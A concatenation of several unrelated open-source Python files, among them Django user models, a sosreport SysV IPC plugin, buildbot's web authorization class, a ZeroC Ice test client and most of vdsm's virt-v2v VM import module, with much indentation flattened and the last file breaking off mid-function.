class OrganisationType(models.Model):
type_desc = models.CharField(max_length=200)
def __unicode__(self):
return self.type_desc
class Address(models.Model):
street_address = models.CharField(max_length=100)
city = models.CharField(max_length=100)
pin = models.CharField(max_length=10)
province = models.CharField(max_length=100)
nationality = models.CharField(max_length=100)
def __unicode__(self):
return self.street_address + ',' + self.city
class HattiUser(models.Model):
user = models.OneToOneField(User)
address = models.ForeignKey(Address)
telephone = models.CharField(max_length=500)
date_joined = models.DateTimeField(auto_now_add=True)
fax = models.CharField(max_length=100)
avatar = models.CharField(max_length=100, null=True, blank=True)
tagline = models.CharField(max_length=140)
class Meta:
abstract = True
class AdminOrganisations(HattiUser):
title = models.CharField(max_length=200)
organisation_type = models.ForeignKey(OrganisationType)
def __unicode__(self):
return self.title
class Customer(HattiUser):
title = models.CharField(max_length=200, blank=True, null=True)
    is_org = models.BooleanField()
    org_type = models.ForeignKey(OrganisationType)
    company = models.CharField(max_length=200)
    def __unicode__(self):
        return unicode(self.user)
|
portante/sosreport
|
sos/plugins/sysvipc.py
|
## Copyright (C) 2007-2012 Red Hat, Inc., Bryn M. Reeves <bmr@redhat.com>
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
from sos.plugins import Plugin, RedHatPlugin, DebianPlugin, UbuntuPlugin
class SysVIPC(Plugin, RedHatPlugin, DebianPlugin, UbuntuPlugin):
"""SysV IPC related information
"""
plugin_name = "sysvipc"
def setup(self):
self.add_copy_specs([
"/proc/sysvipc/msg",
"/proc/sysvipc/sem",
"/proc/sysvipc/shm"
])
self.add_cmd_output("ipcs")
# vim: et ts=4 sw=4
|
centrumholdings/buildbot
|
buildbot/status/web/authz.py
|
from buildbot.status.web.auth import IAuth
class Authz(object):
"""Decide who can do what."""
knownActions = [
# If you add a new action here, be sure to also update the documentation
# at docs/cfg-statustargets.texinfo
'gracefulShutdown',
'forceBuild',
'forceAllBuilds',
'pingBuilder',
'stopBuild',
'stopAllBuilds',
'cancelPendingBuild',
]
def __init__(self,
default_action=False,
auth=None,
**kwargs):
self.auth = auth
if auth:
assert IAuth.providedBy(auth)
self.config = dict( (a, default_action) for a in self.knownActions )
for act in self.knownActions:
if act in kwargs:
self.config[act] = kwargs[act]
del kwargs[act]
if kwargs:
raise ValueError("unknown authorization action(s) " + ", ".join(kwargs.keys()))
def advertiseAction(self, action):
"""Should the web interface even show the form for ACTION?"""
if action not in self.knownActions:
raise KeyError("unknown action")
cfg = self.config.get(action, False)
if cfg:
return True
return False
def needAuthForm(self, action):
"""Does this action require an authentication form?"""
if action not in self.knownActions:
raise KeyError("unknown action")
cfg = self.config.get(action, False)
if cfg == 'auth' or callable(cfg):
return True
return False
def actionAllowed(self, action, request, *args):
"""Is this ACTION allowed, given this http REQUEST?"""
if action not in self.knownActions:
raise KeyError("unknown action")
cfg = self.config.get(action, False)
if cfg:
if cfg == 'auth' or callable(cfg):
if not self.auth:
return False
user = request.args.get("username", ["<unknown>"])[0]
passwd = request.args.get("passwd", ["<no-password>"])[0]
if user == "<unknown>" or passwd == "<no-password>":
return False
if self.auth.authenticate(user, passwd):
if callable(cfg) and not cfg(user, *args):
return False
return True
return False
else:
return True # anyone can do this..
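# A usage sketch (BasicAuth and the concrete option values are illustrative;
# any IAuth provider and any knownActions kwargs work the same way):
#   from buildbot.status.web.auth import BasicAuth
#   authz = Authz(auth=BasicAuth([('dev', 'secret')]),
#                 pingBuilder=True,    # advertised, no auth needed
#                 forceBuild='auth')   # advertised, requires authentication
#   authz.advertiseAction('forceBuild')  # -> True
#   authz.needAuthForm('forceBuild')     # -> True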
|
joshmoore/zeroc-ice
|
py/test/Ice/faultTolerance/Client.py
|
#!/usr/bin/env python
# **********************************************************************
#
# Copyright (c) 2003-2011 ZeroC, Inc. All rights reserved.
#
# This copy of Ice is licensed to you under the terms described in the
# ICE_LICENSE file included in this distribution.
#
# **********************************************************************
import os, sys, traceback
import Ice, AllTests
def test(b):
if not b:
raise RuntimeError('test assertion failed')
def usage(n):
sys.stderr.write("Usage: " + n + " port...\n")
def run(args, communicator):
ports = []
for arg in args[1:]:
if arg[0] == '-':
sys.stderr.write(args[0] + ": unknown option `" + arg + "'\n")
usage(args[0])
return False
ports.append(int(arg))
if len(ports) == 0:
sys.stderr.write(args[0] + ": no ports specified\n")
usage(args[0])
return False
try:
AllTests.allTests(communicator, ports)
except:
traceback.print_exc()
test(False)
return True
communicator = None  # so the cleanup below works even if initialization fails
try:
initData = Ice.InitializationData()
initData.properties = Ice.createProperties(sys.argv)
#
# This test aborts servers, so we don't want warnings.
#
initData.properties.setProperty('Ice.Warn.Connections', '0')
communicator = Ice.initialize(sys.argv, initData)
status = run(sys.argv, communicator)
except:
traceback.print_exc()
status = False
if communicator:
try:
communicator.destroy()
except:
traceback.print_exc()
status = False
sys.exit(not status)
|
EdDev/vdsm
|
lib/vdsm/v2v.py
|
# Copyright 2014-2017 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Refer to the README and COPYING files for full details of the license
#
"""
When importing a VM, a thread starts a new virt-v2v process.
Progress and status of the process (i.e. the job) are reported back
via getVdsStats() in the fields 'progress' and 'status':
'progress' is a number representing the percentage of a single disk copy,
'status' reports the state of the job (init, error etc.)
"""
from __future__ import absolute_import
from collections import namedtuple
from contextlib import closing, contextmanager
import errno
import io
import logging
import os
import re
import subprocess
import tarfile
import time
import threading
import xml.etree.ElementTree as ET
import zipfile
import libvirt
from vdsm.cmdutils import wrap_command
from vdsm.commands import execCmd, BUFFSIZE
from vdsm.common import cmdutils
from vdsm.common.define import errCode, doneCode
from vdsm.common import response
from vdsm.common import zombiereaper
from vdsm.common.compat import CPopen
from vdsm.common.logutils import traceback
from vdsm.common.time import monotonic_time
from vdsm.constants import P_VDSM_LOG, P_VDSM_RUN, EXT_KVM_2_OVIRT
from vdsm import concurrent, libvirtconnection
from vdsm import password
from vdsm.utils import terminating, NICENESS, IOCLASS
try:
import ovirt_imageio_common
except ImportError:
ovirt_imageio_common = None
_lock = threading.Lock()
_jobs = {}
_V2V_DIR = os.path.join(P_VDSM_RUN, 'v2v')
_LOG_DIR = os.path.join(P_VDSM_LOG, 'import')
_VIRT_V2V = cmdutils.CommandPath('virt-v2v', '/usr/bin/virt-v2v')
_SSH_AGENT = cmdutils.CommandPath('ssh-agent', '/usr/bin/ssh-agent')
_SSH_ADD = cmdutils.CommandPath('ssh-add', '/usr/bin/ssh-add')
_XEN_SSH_PROTOCOL = 'xen+ssh'
_VMWARE_PROTOCOL = 'vpx'
_KVM_PROTOCOL = 'qemu'
_SSH_AUTH_RE = '(SSH_AUTH_SOCK)=([^;]+).*;\nSSH_AGENT_PID=(\d+)'
_OVF_RESOURCE_CPU = 3
_OVF_RESOURCE_MEMORY = 4
_OVF_RESOURCE_NETWORK = 10
_QCOW2_COMPAT_SUPPORTED = ('0.10', '1.1')
# OVF Specification:
# https://www.iso.org/obp/ui/#iso:std:iso-iec:17203:ed-1:v1:en
_OVF_NS = 'http://schemas.dmtf.org/ovf/envelope/1'
_RASD_NS = 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/' \
'CIM_ResourceAllocationSettingData'
ImportProgress = namedtuple('ImportProgress',
['current_disk', 'disk_count', 'description'])
DiskProgress = namedtuple('DiskProgress', ['progress'])
class STATUS:
'''
    STARTING: request granted and the import process is starting
    COPYING_DISK: disk copy in progress
    ABORTED: user initiated abort
    FAILED: error during the import process
    DONE: conversion process finished successfully
'''
STARTING = 'starting'
COPYING_DISK = 'copying_disk'
ABORTED = 'aborted'
FAILED = 'error'
DONE = 'done'
class V2VError(Exception):
''' Base class for v2v errors '''
err_name = 'unexpected' # TODO: use more specific error
class ClientError(Exception):
''' Base class for client error '''
err_name = 'unexpected'
class InvalidVMConfiguration(ValueError):
''' Unexpected error while parsing libvirt domain xml '''
class OutputParserError(V2VError):
''' Error while parsing virt-v2v output '''
class JobExistsError(ClientError):
''' Job already exists in _jobs collection '''
err_name = 'JobExistsError'
class VolumeError(ClientError):
''' Error preparing volume '''
class NoSuchJob(ClientError):
    ''' Job does not exist in _jobs collection '''
err_name = 'NoSuchJob'
class JobNotDone(ClientError):
''' Import process still in progress '''
err_name = 'JobNotDone'
class NoSuchOvf(V2VError):
    ''' Ovf path does not exist in /var/run/vdsm/v2v/ '''
err_name = 'V2VNoSuchOvf'
class V2VProcessError(V2VError):
    ''' virt-v2v process failed during execution '''
class InvalidInputError(ClientError):
''' Invalid input received '''
def get_external_vms(uri, username, password, vm_names=None):
if vm_names is not None:
if not vm_names:
vm_names = None
else:
vm_names = frozenset(vm_names)
try:
conn = libvirtconnection.open_connection(uri=uri,
username=username,
passwd=password)
except libvirt.libvirtError as e:
logging.exception('error connecting to hypervisor')
return {'status': {'code': errCode['V2VConnection']['status']['code'],
'message': str(e)}}
with closing(conn):
vms = []
for vm in _list_domains(conn):
if vm_names is not None and vm.name() not in vm_names:
# Skip this VM.
continue
elif conn.getType() == "ESX" and _vm_has_snapshot(vm):
logging.error("vm %r has snapshots and therefore can not be "
"imported since snapshot conversion is not "
"supported for VMware", vm.name())
continue
_add_vm(conn, vms, vm)
return {'status': doneCode, 'vmList': vms}
def get_external_vm_names(uri, username, password):
try:
conn = libvirtconnection.open_connection(uri=uri,
username=username,
passwd=password)
except libvirt.libvirtError as e:
logging.exception('error connecting to hypervisor')
return response.error('V2VConnection', str(e))
with closing(conn):
vms = [vm.name() for vm in _list_domains(conn)]
return response.success(vmNames=vms)
def convert_external_vm(uri, username, password, vminfo, job_id, irs):
if uri.startswith(_XEN_SSH_PROTOCOL):
command = XenCommand(uri, vminfo, job_id, irs)
elif uri.startswith(_VMWARE_PROTOCOL):
command = LibvirtCommand(uri, username, password, vminfo, job_id,
irs)
elif uri.startswith(_KVM_PROTOCOL):
if ovirt_imageio_common is None:
            raise V2VError('Unsupported protocol KVM, the ovirt_imageio_common'
                           ' package is needed for importing KVM images')
command = KVMCommand(uri, username, password, vminfo, job_id, irs)
else:
        raise ClientError('Unknown protocol for Libvirt uri: %s' % uri)
job = ImportVm(job_id, command)
job.start()
_add_job(job_id, job)
return {'status': doneCode}
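# Illustrative URIs for the prefixes dispatched above:
#   'xen+ssh://root@xenhost/system'      -> XenCommand
#   'vpx://admin@vcenter/dc/cluster/esx' -> LibvirtCommand
#   'qemu+tcp://kvmhost/system'          -> KVMCommand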
def convert_ova(ova_path, vminfo, job_id, irs):
command = OvaCommand(ova_path, vminfo, job_id, irs)
job = ImportVm(job_id, command)
job.start()
_add_job(job_id, job)
return response.success()
def get_ova_info(ova_path):
ns = {'ovf': _OVF_NS, 'rasd': _RASD_NS}
try:
root = ET.fromstring(_read_ovf_from_ova(ova_path))
except ET.ParseError as e:
raise V2VError('Error reading ovf from ova, position: %r' % e.position)
vm = {}
_add_general_ovf_info(vm, root, ns, ova_path)
_add_disks_ovf_info(vm, root, ns)
_add_networks_ovf_info(vm, root, ns)
return response.success(vmList=vm)
def get_converted_vm(job_id):
try:
job = _get_job(job_id)
_validate_job_done(job)
ovf = _read_ovf(job_id)
except ClientError as e:
logging.info('Converted VM error %s', e)
return errCode[e.err_name]
except V2VError as e:
logging.error('Converted VM error %s', e)
return errCode[e.err_name]
return {'status': doneCode, 'ovf': ovf}
def delete_job(job_id):
try:
job = _get_job(job_id)
_validate_job_finished(job)
_remove_job(job_id)
except ClientError as e:
logging.info('Cannot delete job, error: %s', e)
return errCode[e.err_name]
return {'status': doneCode}
def abort_job(job_id):
try:
job = _get_job(job_id)
job.abort()
except ClientError as e:
logging.info('Cannot abort job, error: %s', e)
return errCode[e.err_name]
return {'status': doneCode}
def get_jobs_status():
ret = {}
with _lock:
items = tuple(_jobs.items())
for job_id, job in items:
ret[job_id] = {
'status': job.status,
'description': job.description,
'progress': job.progress
}
return ret
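# Sketch of the mapping returned by get_jobs_status() (values illustrative):
#   {'<job-uuid>': {'status': 'copying_disk',
#                   'description': 'Copying disk 1/2',
#                   'progress': 35}}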
def _add_job(job_id, job):
with _lock:
if job_id in _jobs:
raise JobExistsError("Job %r exists" % job_id)
_jobs[job_id] = job
def _get_job(job_id):
with _lock:
if job_id not in _jobs:
raise NoSuchJob("No such job %r" % job_id)
return _jobs[job_id]
def _remove_job(job_id):
with _lock:
if job_id not in _jobs:
raise NoSuchJob("No such job %r" % job_id)
del _jobs[job_id]
def _validate_job_done(job):
if job.status != STATUS.DONE:
raise JobNotDone("Job %r is %s" % (job.id, job.status))
def _validate_job_finished(job):
if job.status not in (STATUS.DONE, STATUS.FAILED, STATUS.ABORTED):
raise JobNotDone("Job %r is %s" % (job.id, job.status))
def _read_ovf(job_id):
file_name = os.path.join(_V2V_DIR, "%s.ovf" % job_id)
try:
with open(file_name, 'r') as f:
return f.read()
except IOError as e:
if e.errno != errno.ENOENT:
raise
raise NoSuchOvf("No such ovf %r" % file_name)
class SSHAgent(object):
"""
    virt-v2v uses ssh-agent when importing Xen vms from libvirt;
    after virt-v2v logs in to the machine it needs to copy the disks,
    which ssh-agent lets it do without passwords while the session
    is active.
    For more information please refer to the virt-v2v man page:
    http://libguestfs.org/virt-v2v.1.html
"""
def __init__(self):
self._auth = None
self._agent_pid = None
self._ssh_auth_re = re.compile(_SSH_AUTH_RE)
def __enter__(self):
rc, out, err = execCmd([_SSH_AGENT.cmd], raw=True)
if rc != 0:
raise V2VError('Error init ssh-agent, exit code: %r'
', out: %r, err: %r' %
(rc, out, err))
m = self._ssh_auth_re.match(out)
# looking for: SSH_AUTH_SOCK=/tmp/ssh-VEE74ObhTWBT/agent.29917
self._auth = {m.group(1): m.group(2)}
self._agent_pid = m.group(3)
try:
rc, out, err = execCmd([_SSH_ADD.cmd], env=self._auth)
except:
self._kill_agent()
raise
if rc != 0:
# 1 = general fail
            # 2 = no agent
if rc != 2:
self._kill_agent()
raise V2VError('Error init ssh-add, exit code: %r'
', out: %r, err: %r' %
(rc, out, err))
def __exit__(self, *args):
rc, out, err = execCmd([_SSH_ADD.cmd, '-d'], env=self._auth)
if rc != 0:
logging.error('Error deleting ssh-add, exit code: %r'
', out: %r, err: %r' %
(rc, out, err))
self._kill_agent()
def _kill_agent(self):
rc, out, err = execCmd([_SSH_AGENT.cmd, '-k'],
env={'SSH_AGENT_PID': self._agent_pid})
if rc != 0:
logging.error('Error killing ssh-agent (PID=%r), exit code: %r'
', out: %r, err: %r' %
(self._agent_pid, rc, out, err))
@property
def auth(self):
return self._auth
class V2VCommand(object):
def __init__(self, vminfo, vmid, irs):
self._vminfo = vminfo
self._vmid = vmid
self._irs = irs
self._prepared_volumes = []
self._passwd_file = os.path.join(_V2V_DIR, "%s.tmp" % vmid)
self._password = password.ProtectedPassword('')
self._base_command = [_VIRT_V2V.cmd, '-v', '-x']
self._query_v2v_caps()
if 'qcow2_compat' in vminfo:
qcow2_compat = vminfo['qcow2_compat']
if qcow2_compat not in _QCOW2_COMPAT_SUPPORTED:
logging.error('Invalid QCOW2 compat version %r' %
qcow2_compat)
raise ValueError('Invalid QCOW2 compat version %r' %
qcow2_compat)
if 'vdsm-compat-option' in self._v2v_caps:
self._base_command.extend(['--vdsm-compat', qcow2_compat])
elif qcow2_compat != '0.10':
# Note: qcow2 is only a suggestion from the engine
# if virt-v2v doesn't support it we fall back to default
logging.info('virt-v2v not supporting qcow2 compat version: '
'%r', qcow2_compat)
def execute(self):
raise NotImplementedError("Subclass must implement this")
def _command(self):
raise NotImplementedError("Subclass must implement this")
def _start_helper(self):
timestamp = time.strftime('%Y%m%dT%H%M%S')
log = os.path.join(_LOG_DIR,
"import-%s-%s.log" % (self._vmid, timestamp))
logging.info("Storing import log at: %r", log)
v2v = _simple_exec_cmd(self._command(),
nice=NICENESS.HIGH,
ioclass=IOCLASS.IDLE,
env=self._environment(),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
tee = _simple_exec_cmd(['tee', log],
nice=NICENESS.HIGH,
ioclass=IOCLASS.IDLE,
stdin=v2v.stdout,
stdout=subprocess.PIPE)
return PipelineProc(v2v, tee)
def _get_disk_format(self):
fmt = self._vminfo.get('format', 'raw').lower()
return "qcow2" if fmt == "cow" else fmt
def _disk_parameters(self):
parameters = []
for disk in self._vminfo['disks']:
try:
parameters.append('--vdsm-image-uuid')
parameters.append(disk['imageID'])
parameters.append('--vdsm-vol-uuid')
parameters.append(disk['volumeID'])
except KeyError as e:
raise InvalidInputError('Job %r missing required property: %s'
% (self._vmid, e))
return parameters
@contextmanager
def _volumes(self):
self._prepare_volumes()
try:
yield
finally:
self._teardown_volumes()
def _prepare_volumes(self):
if len(self._vminfo['disks']) < 1:
            raise InvalidInputError('Job %r cannot import vm with no disk'
                                    % self._vmid)
for disk in self._vminfo['disks']:
drive = {'poolID': self._vminfo['poolID'],
'domainID': self._vminfo['domainID'],
'volumeID': disk['volumeID'],
'imageID': disk['imageID']}
res = self._irs.prepareImage(drive['domainID'],
drive['poolID'],
drive['imageID'],
drive['volumeID'])
if res['status']['code']:
raise VolumeError('Job %r bad volume specification: %s' %
(self._vmid, drive))
drive['path'] = res['path']
self._prepared_volumes.append(drive)
def _teardown_volumes(self):
for drive in self._prepared_volumes:
try:
self._irs.teardownImage(drive['domainID'],
drive['poolID'],
drive['imageID'])
except Exception as e:
logging.error('Job %r error tearing down drive: %s',
self._vmid, e)
def _get_storage_domain_path(self, path):
'''
prepareImage returns /prefix/sdUUID/images/imgUUID/volUUID
        we need the storage domain's absolute path, so we go up 3 levels
'''
return path.rsplit(os.sep, 3)[0]
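    # e.g. (prefix illustrative):
    # '/rhev/data-center/mnt/srv:_export/sdUUID/images/imgUUID/volUUID'
    #   -> '/rhev/data-center/mnt/srv:_export/sdUUID'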
def _environment(self):
# Provide some sane environment
env = os.environ.copy()
# virt-v2v specific variables
env['LIBGUESTFS_BACKEND'] = 'direct'
if 'virtio_iso_path' in self._vminfo:
env['VIRTIO_WIN'] = self._vminfo['virtio_iso_path']
return env
@contextmanager
def _password_file(self):
fd = os.open(self._passwd_file, os.O_WRONLY | os.O_CREAT, 0o600)
try:
if self._password.value is None:
os.write(fd, "")
else:
os.write(fd, self._password.value)
finally:
os.close(fd)
try:
yield
finally:
try:
os.remove(self._passwd_file)
except Exception:
logging.exception("Job %r error removing passwd file: %s",
self._vmid, self._passwd_file)
def _query_v2v_caps(self):
self._v2v_caps = frozenset()
p = _simple_exec_cmd([_VIRT_V2V.cmd, '--machine-readable'],
env=os.environ.copy(),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with terminating(p):
try:
out, err = p.communicate()
except Exception:
logging.exception('Terminating virt-v2v process after error')
raise
if p.returncode != 0:
raise V2VProcessError(
'virt-v2v exited with code: %d, stderr: %r' %
(p.returncode, err))
self._v2v_caps = frozenset(out.splitlines())
logging.debug("Detected virt-v2v capabilities: %r", self._v2v_caps)
class LibvirtCommand(V2VCommand):
def __init__(self, uri, username, password, vminfo, vmid, irs):
super(LibvirtCommand, self).__init__(vminfo, vmid, irs)
self._uri = uri
self._username = username
self._password = password
def _command(self):
cmd = self._base_command
cmd.extend(['-ic', self._uri,
'-o', 'vdsm',
'-of', self._get_disk_format(),
'-oa', self._vminfo.get('allocation', 'sparse').lower()])
cmd.extend(self._disk_parameters())
cmd.extend(['--password-file',
self._passwd_file,
'--vdsm-vm-uuid',
self._vmid,
'--vdsm-ovf-output',
_V2V_DIR,
'--machine-readable',
'-os',
self._get_storage_domain_path(
self._prepared_volumes[0]['path']),
self._vminfo['vmName']])
return cmd
@contextmanager
def execute(self):
with self._volumes(), self._password_file():
yield self._start_helper()
class OvaCommand(V2VCommand):
def __init__(self, ova_path, vminfo, vmid, irs):
super(OvaCommand, self).__init__(vminfo, vmid, irs)
self._ova_path = ova_path
def _command(self):
cmd = self._base_command
cmd.extend(['-i', 'ova', self._ova_path,
'-o', 'vdsm',
'-of', self._get_disk_format(),
'-oa', self._vminfo.get('allocation', 'sparse').lower(),
'--vdsm-vm-uuid',
self._vmid,
'--vdsm-ovf-output',
_V2V_DIR,
'--machine-readable',
'-os',
self._get_storage_domain_path(
self._prepared_volumes[0]['path'])])
cmd.extend(self._disk_parameters())
return cmd
@contextmanager
def execute(self):
with self._volumes():
yield self._start_helper()
class XenCommand(V2VCommand):
"""
    Importing from Xen via virt-v2v requires the xen+ssh protocol.
    This requires:
    - enabling the vdsm user in /etc/passwd
    - generating ssh keys via ssh-keygen
    - exchanging the public key with the user on the importing host
    - the host must be in ~/.ssh/known_hosts (done automatically
      by ssh-ing to the host before importing the vm)
"""
def __init__(self, uri, vminfo, job_id, irs):
super(XenCommand, self).__init__(vminfo, job_id, irs)
self._uri = uri
self._ssh_agent = SSHAgent()
def _command(self):
cmd = self._base_command
cmd.extend(['-ic', self._uri,
'-o', 'vdsm',
'-of', self._get_disk_format(),
'-oa', self._vminfo.get('allocation', 'sparse').lower()])
cmd.extend(self._disk_parameters())
cmd.extend(['--vdsm-vm-uuid',
self._vmid,
'--vdsm-ovf-output',
_V2V_DIR,
'--machine-readable',
'-os',
self._get_storage_domain_path(
self._prepared_volumes[0]['path']),
self._vminfo['vmName']])
return cmd
@contextmanager
def execute(self):
with self._volumes(), self._ssh_agent:
yield self._start_helper()
def _environment(self):
env = super(XenCommand, self)._environment()
env.update(self._ssh_agent.auth)
return env
class KVMCommand(V2VCommand):
def __init__(self, uri, username, password, vminfo, vmid, irs):
super(KVMCommand, self).__init__(vminfo, vmid, irs)
self._uri = uri
self._username = username
self._password = password
def _command(self):
cmd = [EXT_KVM_2_OVIRT,
'--uri', self._uri]
if self._username is not None:
cmd.extend([
'--username', self._username,
'--password-file', self._passwd_file])
src, fmt = self._source_images()
cmd.append('--source')
cmd.extend(src)
cmd.append('--dest')
cmd.extend(self._dest_images())
cmd.append('--storage-type')
cmd.extend(fmt)
cmd.append('--vm-name')
cmd.append(self._vminfo['vmName'])
return cmd
@contextmanager
def execute(self):
with self._volumes(), self._password_file():
yield self._start_helper()
def _source_images(self):
con = libvirtconnection.open_connection(uri=self._uri,
username=self._username,
passwd=self._password)
with closing(con):
vm = con.lookupByName(self._vminfo['vmName'])
if vm:
params = {}
root = ET.fromstring(vm.XMLDesc(0))
_add_disks(root, params)
src = []
fmt = []
for disk in params['disks']:
if 'alias' in disk:
src.append(disk['alias'])
fmt.append(disk['disktype'])
return src, fmt
def _dest_images(self):
ret = []
for vol in self._prepared_volumes:
ret.append(vol['path'])
return ret
class PipelineProc(object):
def __init__(self, proc1, proc2):
self._procs = (proc1, proc2)
self._stdout = proc2.stdout
def kill(self):
"""
Kill all processes in a pipeline.
Some of the processes may have already terminated, but some may be
still running. Regular kill() raises OSError if the process has already
terminated. Since we are dealing with multiple processes, to avoid any
confusion we do not raise OSError at all.
"""
for p in self._procs:
logging.debug("Killing pid=%d", p.pid)
try:
p.kill()
except OSError as e:
# Probably the process has already terminated
if e.errno != errno.ESRCH:
raise e
@property
def pids(self):
return [p.pid for p in self._procs]
@property
def returncode(self):
"""
Returns None if any of the processes is still running. Returns 0 if all
        processes have finished with a zero exit code, otherwise returns the
        first nonzero exit code.
"""
ret = 0
for p in self._procs:
p.poll()
if p.returncode is None:
return None
if p.returncode != 0 and ret == 0:
# One of the processes has failed
ret = p.returncode
# All processes have finished
return ret
@property
def stdout(self):
return self._stdout
def wait(self, timeout=None):
if timeout is not None:
deadline = monotonic_time() + timeout
else:
deadline = None
for p in self._procs:
if deadline is not None:
# NOTE: CPopen doesn't support timeout argument.
while monotonic_time() < deadline:
p.poll()
if p.returncode is not None:
break
time.sleep(1)
else:
p.wait()
if deadline is not None:
if deadline < monotonic_time() or self.returncode is None:
# Timed out
return False
return True
class ImportVm(object):
TERM_DELAY = 30
PROC_WAIT_TIMEOUT = 30
def __init__(self, job_id, command):
self._id = job_id
self._command = command
self._thread = None
self._status = STATUS.STARTING
self._description = ''
self._disk_progress = 0
self._disk_count = 1
self._current_disk = 1
self._aborted = False
self._proc = None
def start(self):
self._thread = concurrent.thread(self._run, name="v2v/" + self._id[:8])
self._thread.start()
def wait(self):
if self._thread is not None and self._thread.is_alive():
self._thread.join()
@property
def id(self):
return self._id
@property
def status(self):
return self._status
@property
def description(self):
return self._description
@property
def progress(self):
'''
        progress is derived from the per-disk progress; it is
        flat and not 100% accurate - each disk takes its
        portion, i.e. if we have 2 disks the first takes
        0-50 and the second 50-100
'''
        # use the disk currently being copied, per the docstring above
        completed = (self._current_disk - 1) * 100
return (completed + self._disk_progress) / self._disk_count
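    # Worked example: with 2 disks, disk 1 at 40% -> (0 + 40) / 2 = 20,
    # disk 2 at 40% -> (100 + 40) / 2 = 70.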
@traceback(msg="Error importing vm")
def _run(self):
try:
self._import()
except Exception as ex:
if self._aborted:
logging.debug("Job %r was aborted", self._id)
else:
logging.exception("Job %r failed", self._id)
self._status = STATUS.FAILED
self._description = str(ex)
try:
if self._proc is not None:
self._abort()
except Exception as e:
logging.exception('Job %r, error trying to abort: %r',
self._id, e)
def _import(self):
logging.info('Job %r starting import', self._id)
with self._command.execute() as self._proc:
self._watch_process_output()
self._wait_for_process()
if self._proc.returncode != 0:
raise V2VProcessError('Job %r process failed exit-code: %r' %
(self._id,
self._proc.returncode))
if self._status != STATUS.ABORTED:
self._status = STATUS.DONE
logging.info('Job %r finished import successfully',
self._id)
def _wait_for_process(self):
if self._proc.returncode is not None:
return
logging.debug("Job %r waiting for virt-v2v process", self._id)
if not self._proc.wait(timeout=self.PROC_WAIT_TIMEOUT):
raise V2VProcessError("Job %r timeout waiting for process pid=%s",
self._id, self._proc.pids)
def _watch_process_output(self):
out = io.BufferedReader(io.FileIO(self._proc.stdout.fileno(),
mode='r', closefd=False), BUFFSIZE)
parser = OutputParser()
for event in parser.parse(out):
if isinstance(event, ImportProgress):
self._status = STATUS.COPYING_DISK
logging.info("Job %r copying disk %d/%d",
self._id, event.current_disk, event.disk_count)
self._disk_progress = 0
self._current_disk = event.current_disk
self._disk_count = event.disk_count
self._description = event.description
elif isinstance(event, DiskProgress):
self._disk_progress = event.progress
if event.progress % 10 == 0:
logging.info("Job %r copy disk %d progress %d/100",
self._id, self._current_disk, event.progress)
else:
raise RuntimeError("Job %r got unexpected parser event: %s" %
(self._id, event))
def abort(self):
self._status = STATUS.ABORTED
logging.info('Job %r aborting...', self._id)
self._abort()
def _abort(self):
self._aborted = True
if self._proc is None:
logging.warning(
'Ignoring request to abort job %r; the job failed to start',
self._id)
return
if self._proc.returncode is None:
logging.debug('Job %r killing virt-v2v process', self._id)
try:
self._proc.kill()
except OSError as e:
if e.errno != errno.ESRCH:
raise
logging.debug('Job %r virt-v2v process not running',
self._id)
else:
logging.debug('Job %r virt-v2v process was killed',
self._id)
finally:
for pid in self._proc.pids:
zombiereaper.autoReapPID(pid)
class OutputParser(object):
COPY_DISK_RE = re.compile(r'.*(Copying disk (\d+)/(\d+)).*')
DISK_PROGRESS_RE = re.compile(r'\s+\((\d+).*')
def parse(self, stream):
for line in stream:
if 'Copying disk' in line:
description, current_disk, disk_count = self._parse_line(line)
yield ImportProgress(int(current_disk), int(disk_count),
description)
for chunk in self._iter_progress(stream):
progress = self._parse_progress(chunk)
if progress is not None:
yield DiskProgress(progress)
if progress == 100:
break
def _parse_line(self, line):
m = self.COPY_DISK_RE.match(line)
if m is None:
raise OutputParserError('unexpected format in "Copying disk"'
', line: %r' % line)
return m.group(1), m.group(2), m.group(3)
def _iter_progress(self, stream):
chunk = ''
while True:
c = stream.read(1)
if not c:
raise OutputParserError('copy-disk stream closed unexpectedly')
chunk += c
if c == '\r':
yield chunk
chunk = ''
def _parse_progress(self, chunk):
m = self.DISK_PROGRESS_RE.match(chunk)
if m is None:
return None
try:
return int(m.group(1))
except ValueError:
            raise OutputParserError('error parsing progress regex: %r'
                                    % m.groups())
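# Illustrative virt-v2v output lines and the events the parser yields:
#   'Copying disk 1/2 to /rhev/...'  -> ImportProgress(1, 2, 'Copying disk 1/2')
#   '    (42/100%)\r'                -> DiskProgress(42)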
def _mem_to_mib(size, unit):
lunit = unit.lower()
if lunit in ('bytes', 'b'):
return size / 1024 / 1024
elif lunit in ('kib', 'k'):
return size / 1024
elif lunit in ('mib', 'm'):
return size
elif lunit in ('gib', 'g'):
return size * 1024
elif lunit in ('tib', 't'):
return size * 1024 * 1024
else:
raise InvalidVMConfiguration("Invalid currentMemory unit attribute:"
" %r" % unit)
def _list_domains(conn):
try:
for vm in conn.listAllDomains():
yield vm
# TODO: use only the new API (no need to fall back to listDefinedDomains)
# when supported in Xen under RHEL 5.x
except libvirt.libvirtError as e:
if e.get_error_code() != libvirt.VIR_ERR_NO_SUPPORT:
raise
# Support for old libvirt clients
seen = set()
for name in conn.listDefinedDomains():
try:
vm = conn.lookupByName(name)
except libvirt.libvirtError as e:
logging.error("Error looking up vm %r: %s", name, e)
else:
seen.add(name)
yield vm
for domainId in conn.listDomainsID():
try:
vm = conn.lookupByID(domainId)
except libvirt.libvirtError as e:
